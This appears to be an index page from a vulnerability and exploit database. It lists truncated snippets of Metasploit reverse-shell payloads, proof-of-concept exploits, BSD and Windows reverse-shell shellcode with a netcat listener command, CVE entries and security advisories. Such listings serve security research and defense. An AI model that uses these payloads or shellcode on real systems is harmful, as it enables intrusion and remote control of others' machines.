Windows Command, Double Reverse TCP Connection (via Perl)
Creates an interactive shell via Perl. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 148 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def initialize(info...
Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)
/ PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug Advisory is available at: http://www.bratax.be/advisories/b013.html multiple vulnerabilities! check it out! @author: bratax @url: http://www.bratax.be/ @email: [email protected] Thanks to BuzzDee for teaching me how to us...
Xitami Web Server v2.5c2 LRWP Processing Format String PoC
Exploit for unknown platform in category dos / poc ========================================================== Xitami Web Server v2.5c2 LRWP Processing Format String PoC ========================================================== / PoC exploit for Xitami Web Server v2.5c2 LRWP processing format...
HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe Overflow (SEH)
HP OpenView Network Node Manager OV NNM 7.5.1 - OVAS.exe Overflow SEH #!/usr/bin/python HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow Tested on Windows 2003 Server SP1. Coded by Mati Aharoni muts..at..offensive-security.com http://www.offensive-security.com/0day/hp-nnm-ov.py.txt...
[SECURITY] Fedora 7 Update: Perlbal-1.70-1.fc7
Perlbal is a single-threaded event-based server supporting HTTP load balancing, web serving, and a mix of the two. Perlbal can act as either a web server or a reverse proxy. One of the defining things about Perlbal is that almost everything can be configured or reconfigured on the fly without...
[SECURITY] Fedora 8 Update: Perlbal-1.70-1.fc8
Perlbal is a single-threaded event-based server supporting HTTP load balancing, web serving, and a mix of the two. Perlbal can act as either a web server or a reverse proxy. One of the defining things about Perlbal is that almost everything can be configured or reconfigured on the fly without...
PECL 3.0.x - Alternative PHP Cache Extension apc_search_paths() Remote Buffer Overflow
PECL 3.0.x - Alternative PHP Cache Extension apc_search_paths() Remote Buffer Overflow source: https://www.securityfocus.com/bid/28457/info PECL Alternative PHP Cache APC extension is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input...
CVE-2008-1005
WebCore, as used in Apple Safari before 3.1, does not properly mask the password field when reverse conversion is used with the Kotoeri input method, which allows physically proximate attackers to read the password...
CVE-2008-1005
CVE-2008-1005 affects Apple Safari (WebCore) prior to 3.1. The issue is that the password field is not properly masked during reverse conversion with the Kotoeri input method, allowing physically proximate attackers to read the password. The related connected material confirms Safari 3.1 addresse...
Reverse NAT/Intercepting Proxy Detection
Reverse NAT is a technology which lets multiple computers offer public services on different ports via the same IP address. Based on OS fingerprinting results, it seems that different operating systems are listening on different remote ports. Note that this behavior may also indicate the presence...
PHP Command Shell, Reverse TCP (via PHP)
Reverse PHP connect back shell with checks for disabled functions This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::Single include Msf::Payload::Php...
Design/Logic Flaw
Geert Moernaut LSrunasE and Supercrypt use an encryption key composed of an SHA1 hash of a fixed string embedded in the executable file, which makes it easier for local users to obtain this key without reverse engineering...
Insecure Use of RC4 in LSrunasE and Supercrypt (CVE-2007-6340)
COMPASS SECURITY ADVISORY http://www.csnc.ch/ Product: LSrunasE, Supercrypt Vendor: Geert Moernaut Type: Flawed Encryption Risk: Medium Author: Daniel Roethlisberger Date: 2008-01-29 CVE Name: CVE-2007-6340 Introduction ------------ LSrunasE 1 and Supercrypt 2 are utilities used to run commands...
NetWare Command Shell, Reverse TCP Stager
Connect to the NetWare console staged. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasm' module MetasploitModule CachedSize = 281 include Msf::Payload::Stager include...
Digging out unexported operating system functions to carry injection through to the end - vulnerability warning - Black Bar Safety Net
InjectCode for Win9x. Article author: Anskya. Original source: Kanxue Forum. Please retain the copyright notice when reposting. Thank you. There are many injection methods nowadays, but they fall into three broad categories: 1. Map the code into the target and then create a remote thread 2. Use a message hook to insert the DLL 3...
Jetty fails to properly process URLs that contain double / characters
Overview The Jetty web server contains a vulnerability that may allow an attacker to access private files or directories. Description Jetty is a web server that is implemented in Java. Jetty contains a vulnerability in the way it processes URLs with multiple "/" slash characters. See the Jetty...
bsd/x86 reverse portbind 129 bytes
No description provided by source. /* reverse-portshell BSD shellcode by noir */ /* local usage: ./reverse-shell 192.168.2.33 */ /* remote: nc -n -v -v -l -p 6969 */ /* listen on 6969/tcp */ /* [email protected] */ char shellcode = 0x31,0xc9,0x51,0x41, ...
Windows 9x/NT/2k/XP Reverse Generic Shellcode w/o Loader 249 bytes
No description provided by source. We use the PEB for the Output/Input/Error Handles. typedef struct PEB BOOLEAN InheritedAddressSpace ; BOOLEAN ReadImageFileExecOptions ; BOOLEAN BeingDebugged ; BOOLEAN Spare ; HANDLE Mutant ; PVOID ImageBaseAddress ; PPEB_LDR_DATA LoaderData ; PRTL_USER_PROCESS...
IBM Director fails to properly time-out connection requests from clients
Overview IBM Director Systems, specifically CIM Server, contains a denial-of-service vulnerability that can allow a remote, unauthenticated attacker to render Director inoperative. Description IBM Director is a suite of system management tools. When a rogue connection request is made to IBM Direct...